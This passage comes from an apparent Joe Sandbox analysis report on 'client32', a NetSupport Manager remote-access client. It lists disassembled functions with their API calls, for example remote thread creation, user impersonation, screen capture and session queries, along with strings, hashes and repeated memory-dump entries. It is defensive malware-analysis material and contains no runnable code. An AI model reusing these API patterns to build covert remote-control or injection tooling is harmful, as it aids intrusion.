                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountEventMessageSendTick$CloseHandleOpenTimeout__wcstoi64wsprintf
                                                                              • String ID: %s$DATA$Error. Runplugin is unresponsive$INIT$TracePlugins$Warning: SendMessage to Runplugin took %d ms (possibly unresponsive)$_debug$runplugin %s (hWnd=%x,u=%d,64=%d) $runplugin.dmp.1
                                                                              • API String ID: 3451743168-2289091950
                                                                              • Opcode ID: ead4b02f65febedee58ec954df4c387db7c39c25c30fbfeabe7c28379be18f45
                                                                              • Instruction ID: 06eeb675c9fb82aaee3c5e1b90d71b9ae50c85907530b7dc4e87486fa2a47647
                                                                              • Opcode Fuzzy Hash: ead4b02f65febedee58ec954df4c387db7c39c25c30fbfeabe7c28379be18f45
                                                                              • Instruction Fuzzy Hash: A141E775A012199FD724CFA5DC84FAEF7B8EF48304F1085AAE91AA7640D631AD40CFB1
                                                                              Function 111261C0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 110libraryloaderthreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(Kernel32), ref: 111261DA
                                                                              • GetCurrentProcess.KERNEL32(FFFFFFFF,001F0FFF,00000000,00000000), ref: 111261F6
                                                                              • GetCurrentProcess.KERNEL32(?,00000000), ref: 111261FD
                                                                              • DuplicateHandle.KERNEL32(00000000), ref: 11126200
                                                                              • GetExitCodeProcess.KERNEL32(FFFFFFFF,?), ref: 11126219
                                                                              • GetProcAddress.KERNEL32(00000000,ExitProcess), ref: 11126232
                                                                              • CreateRemoteThread.KERNEL32(FFFFFFFF,00000000,00000000,00000000,?,00000000,?), ref: 11126251
                                                                              • GetLastError.KERNEL32 ref: 1112625D
                                                                              • TerminateProcess.KERNEL32(?,?), ref: 11126268
                                                                              • CloseHandle.KERNEL32(FFFFFFFF), ref: 111262CF
                                                                              • SetLastError.KERNEL32(0000042B), ref: 111262DD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Process$Handle$CurrentErrorLast$AddressCloseCodeCreateDuplicateExitModuleProcRemoteTerminateThread
                                                                              • String ID: ExitProcess$Kernel32
                                                                              • API String ID: 109174691-3456457508
                                                                              • Opcode ID: fabdeca340e6ff03c0eedb30f588ecf15a12367a9a7063cf99c13d5dcaf9420d
                                                                              • Instruction ID: 371920ae97de46759c1d7ed025a308ea72f9d8c42ad683334f98a63784c5ace3
                                                                              • Opcode Fuzzy Hash: fabdeca340e6ff03c0eedb30f588ecf15a12367a9a7063cf99c13d5dcaf9420d
                                                                              • Instruction Fuzzy Hash: 8431C075E40229EBDB158FE5CE88A9EFB78EF45724F110565FC20A3680D7709A00CBA0
                                                                              Function 111361C0 Relevance: 28.3, APIs: 11, Strings: 5, Instructions: 260windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • _memset.LIBCMT ref: 11136245
                                                                              • LoadIconA.USER32(00000000,00000455), ref: 11136313
                                                                              • _strncpy.LIBCMT ref: 11136335
                                                                              • Shell_NotifyIconA.SHELL32(00000000,000001E8,?,?,?,?,?,?,?,00000001,00000000,AB86ACF8,?,00000000,00000000), ref: 11136346
                                                                              • LoadIconA.USER32(00000000,0000045C), ref: 11136366
                                                                              • GetWindowTextA.USER32(00040270,?,00000180), ref: 11136388
                                                                              • wsprintfA.USER32 ref: 11136404
                                                                                • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                              • wsprintfA.USER32 ref: 1113643C
                                                                              • wsprintfA.USER32 ref: 1113649D
                                                                              • wsprintfA.USER32 ref: 111364F8
                                                                              • Shell_NotifyIconA.SHELL32(11139E4B,000001E8,00000001,00000000,AB86ACF8,?,00000000,00000000), ref: 11136533
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Iconwsprintf$LoadNotifyShell_$TextWindow__wcstoi64_free_memset_strncpy
                                                                              • String ID: %s$%s%s$562258$Client$SysTray
                                                                              • API String ID: 1881589080-441279933
                                                                              • Opcode ID: 0a5c9f8dc402520b24d99fe5b39b65e0a073f3c8a151d53348388467c30159de
                                                                              • Instruction ID: abc8c5b323baaaa6f48eab0437aa75fb158c5b1e869706a0a7a2bf1e7c9e3741
                                                                              • Opcode Fuzzy Hash: 0a5c9f8dc402520b24d99fe5b39b65e0a073f3c8a151d53348388467c30159de
                                                                              • Instruction Fuzzy Hash: 8BA12B71D0422A9BD722CF64CD94BEAF7B8BB44719F1049ACE91D97284EB71AB44CF40
                                                                              Function 1102A1F0 Relevance: 28.2, APIs: 9, Strings: 7, Instructions: 229libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetComputerNameA.KERNEL32(?,?), ref: 1102A245
                                                                                • Part of subcall function 110F70E0: LoadLibraryA.KERNEL32(Wtsapi32.dll,AB86ACF8,1102E747,?,00000000), ref: 110F711B
                                                                                • Part of subcall function 110F70E0: GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA), ref: 110F7179
                                                                              • LoadLibraryA.KERNEL32(Wtsapi32.dll), ref: 1102A2B8
                                                                              • GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA), ref: 1102A328
                                                                              • GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 1102A3A2
                                                                              • FreeLibrary.KERNEL32(?), ref: 1102A3E7
                                                                                • Part of subcall function 110F7300: LoadLibraryA.KERNEL32(Wtsapi32.dll,AB86ACF8,1102E747,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 110F732D
                                                                                • Part of subcall function 110F7300: GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA), ref: 110F7372
                                                                                • Part of subcall function 110F7300: GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F73C3
                                                                                • Part of subcall function 110F7300: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7423
                                                                              • SetLastError.KERNEL32(00000078), ref: 1102A3B7
                                                                              • SetLastError.KERNEL32(00000078), ref: 1102A3C1
                                                                              • wsprintfA.USER32 ref: 1102A4A7
                                                                              • wsprintfA.USER32 ref: 1102A4B9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressLibraryProc$Load$ErrorFreeLastwsprintf$ComputerName
                                                                              • String ID: $%s%03d$%s%c%02d$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$hydrapark#
                                                                              • API String ID: 3908195755-3513858227
                                                                              • Opcode ID: 71ea406759e04b1339ccfb6e5b0de1db034c181def443d32a597bd66a3dfdd50
                                                                              • Instruction ID: f92ba7b4cbee429c5a8b04187c15bd0f656229ac2bc50c7fba354634dfeb625e
                                                                              • Opcode Fuzzy Hash: 71ea406759e04b1339ccfb6e5b0de1db034c181def443d32a597bd66a3dfdd50
                                                                              • Instruction Fuzzy Hash: 9A918F71D00269DFDB11CF649D84BDEFBB8BB49304F4045E9E459A7600EB71AA88CF51
                                                                              Function 11002340 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 162windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 11001F80: FindWindowA.USER32(Progman,00000000), ref: 11001FA9
                                                                                • Part of subcall function 11001F80: GetWindowThreadProcessId.USER32(00000000,?), ref: 11001FB7
                                                                                • Part of subcall function 11001F80: OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 11001FCB
                                                                                • Part of subcall function 11001F80: GetVersionExA.KERNEL32(?), ref: 11001FE4
                                                                                • Part of subcall function 11001F80: OpenProcessToken.ADVAPI32(00000000,0002000B,00000000), ref: 11002000
                                                                                • Part of subcall function 11001F80: ImpersonateLoggedOnUser.ADVAPI32(00000000), ref: 11002011
                                                                                • Part of subcall function 11001F80: CloseHandle.KERNEL32(00000000), ref: 11002028
                                                                                • Part of subcall function 11001F80: CloseHandle.KERNEL32(00000000), ref: 1100202F
                                                                              • CreateCompatibleBitmap.GDI32(?,?,?), ref: 110023AD
                                                                              • CreateCompatibleDC.GDI32(?), ref: 110023BD
                                                                              • SelectObject.GDI32(00000000,?), ref: 110023D1
                                                                              • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 11002401
                                                                              • _memset.LIBCMT ref: 11002419
                                                                                • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
                                                                                • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                              • GetSaveFileNameA.COMDLG32(00000058,?,?,?,AB86ACF8), ref: 110024A4
                                                                              • EnableWindow.USER32(00000000,00000000), ref: 11002518
                                                                              • SelectObject.GDI32(?,?), ref: 11002522
                                                                              • DeleteObject.GDI32(?), ref: 1100252F
                                                                              • DeleteDC.GDI32(?), ref: 11002536
                                                                              • EnableWindow.USER32(00000000,00000001), ref: 1100255F
                                                                              • RevertToSelf.ADVAPI32(?,?,?,AB86ACF8), ref: 11002561
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$ObjectProcess$CloseCompatibleCreateDeleteEnableFileFolderHandleNameOpenPathSelect$BitmapFindImpersonateLoggedModuleRevertSaveSelfThreadTokenUserVersion_memset
                                                                              • String ID: BMP$X$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 3362589479-2539113696
                                                                              • Opcode ID: f9d947188d7d45801c45cae65f9b05fc20ab652966aa13b62964c56aad9f169a
                                                                              • Instruction ID: 9d3051af6559d4f2dd0c7a1e2ead35f12597f10354149e4796aa47e8d90882b9
                                                                              • Opcode Fuzzy Hash: f9d947188d7d45801c45cae65f9b05fc20ab652966aa13b62964c56aad9f169a
                                                                              • Instruction Fuzzy Hash: 4D51A175E40319AFEB24CF60CC85FEAB7B8FB49748F0045A9E529A7680DB74A940CF51
                                                                              Function 11132160 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 241COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wsprintf
                                                                              • String ID: %s%s$Client$DecompressJPEGToBitmap$DecompressPNGToBitmap$ImageFile$ImageFileUser$PCIImage.dll
                                                                              • API String ID: 2111968516-1286714176
                                                                              • Opcode ID: 5a0a596aa89e9b017834500dd1e75b12524007687034fc42cfb07ef4cc1a64f6
                                                                              • Instruction ID: 02765b2c7a6772d971fa9da819da4de0b757c726f9e67794902461bd1f2e2486
                                                                              • Opcode Fuzzy Hash: 5a0a596aa89e9b017834500dd1e75b12524007687034fc42cfb07ef4cc1a64f6
                                                                              • Instruction Fuzzy Hash: 70913935A503199FE721DFA4CD84FDAF3B4BB88725F1041A8EA19A7284DB70AA40CF51
                                                                              Function 11047010 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 214COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _calloc.LIBCMT ref: 1104702F
                                                                              • wsprintfA.USER32 ref: 110470AE
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • wsprintfA.USER32 ref: 110470E9
                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000014,00000080), ref: 11047203
                                                                              • _strrchr.LIBCMT ref: 1104720C
                                                                              • GetWindowsDirectoryA.KERNEL32(00000016,00000080), ref: 11047235
                                                                              • _free.LIBCMT ref: 11047251
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wsprintf$DirectoryErrorExitFileLastMessageModuleNameProcessWindows_calloc_free_strrchr
                                                                              • String ID: %s %s$CLTCONN.CPP$NSA %s$NSS$V1.10$V12.00$V12.10$V12.10F20
                                                                              • API String ID: 1757445300-1785190265
                                                                              • Opcode ID: 8df59efd58386d5d632d4f9a1d1019fa2f1450115bc2f61edf1bae4acd3b0bfd
                                                                              • Instruction ID: 26d4bceacdf9fffedd66530a5670ce95754bb6fc5caa385817b5218b2f2053ae
                                                                              • Opcode Fuzzy Hash: 8df59efd58386d5d632d4f9a1d1019fa2f1450115bc2f61edf1bae4acd3b0bfd
                                                                              • Instruction Fuzzy Hash: 3F619A78E00657ABD714CFB48CC1B6FF7E99F40308F1048A8ED5697641EA62F904C3A2
                                                                              Function 1101E200 Relevance: 25.7, APIs: 17, Instructions: 151COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,00000002), ref: 1101E216
                                                                                • Part of subcall function 110CE050: GetWindowRect.USER32(00000000,?), ref: 110CE0C5
                                                                                • Part of subcall function 110CE050: GetClientRect.USER32(00000000,?), ref: 110CE0F8
                                                                                • Part of subcall function 110CE050: GetWindowRect.USER32(?,?), ref: 110CE103
                                                                              • GetDlgItem.USER32(?,000013B2), ref: 1101E22E
                                                                              • GetDlgItem.USER32(?,000017DD), ref: 1101E243
                                                                              • GetDlgItem.USER32(?,000013A9), ref: 1101E258
                                                                              • GetDlgItem.USER32(?,?), ref: 1101E26F
                                                                              • GetDlgItem.USER32(?,000013A2), ref: 1101E284
                                                                              • GetDlgItem.USER32(?,000013A4), ref: 1101E299
                                                                              • GetDlgItem.USER32(?,0000139C), ref: 1101E2AE
                                                                              • GetDlgItem.USER32(?,0000139D), ref: 1101E2C3
                                                                              • GetDlgItem.USER32(?,0000139F), ref: 1101E2D8
                                                                              • GetDlgItem.USER32(?,000013AB), ref: 1101E2ED
                                                                              • GetDlgItem.USER32(?,000013B1), ref: 1101E302
                                                                              • GetDlgItem.USER32(?,000013C2), ref: 1101E317
                                                                              • GetDlgItem.USER32(?,000013C3), ref: 1101E32C
                                                                              • GetDlgItem.USER32(?,000013BE), ref: 1101E341
                                                                              • GetDlgItem.USER32(?,000013CA), ref: 1101E356
                                                                              • GetDlgItem.USER32(?,000013C7), ref: 1101E36B
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Item$Rect$Window$Client
                                                                              • String ID:
                                                                              • API String ID: 3380545214-0
                                                                              • Opcode ID: b3566e995a24d8da3f6e69c6acb85c898b2ca1eab53628bbe20bfaa9425c3900
                                                                              • Instruction ID: 41ef9526c6eaf87700d550f6f9343ba82b807524fb7f7e91883361a4ab14b296
                                                                              • Opcode Fuzzy Hash: b3566e995a24d8da3f6e69c6acb85c898b2ca1eab53628bbe20bfaa9425c3900
                                                                              • Instruction Fuzzy Hash: 064121797403053AD634E676CCA5F9F669D9BC4B04F104C2CB25BAB5C1C9A5FD808FA0
                                                                              Function 110061F0 Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 358COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ReleaseDC.USER32(00000000,?), ref: 11006267
                                                                              • InflateRect.USER32(?,?,?), ref: 11006306
                                                                              • SelectObject.GDI32(?,?), ref: 1100632D
                                                                              • MoveToEx.GDI32(?,?,?,00000000), ref: 110063D5
                                                                              • LineTo.GDI32(?,?,?), ref: 11006410
                                                                              • Polygon.GDI32(?,?,00000003), ref: 110064C8
                                                                              • SelectObject.GDI32(?,?), ref: 110064DC
                                                                              • SelectObject.GDI32(?,?), ref: 110064E6
                                                                              • InflateRect.USER32(?,?,?), ref: 11006522
                                                                              • SelectObject.GDI32(?,?), ref: 1100633D
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • GetDC.USER32(00000000), ref: 11006569
                                                                                • Part of subcall function 11002620: SetROP2.GDI32(?,00000007), ref: 11002631
                                                                                • Part of subcall function 11002620: SelectObject.GDI32(?,?), ref: 11002642
                                                                                • Part of subcall function 11002620: MoveToEx.GDI32(?,?,?,00000000), ref: 110026AF
                                                                                • Part of subcall function 11002620: LineTo.GDI32(?,00000000,?), ref: 110026E6
                                                                              • __floor_pentium4.LIBCMT ref: 11006621
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
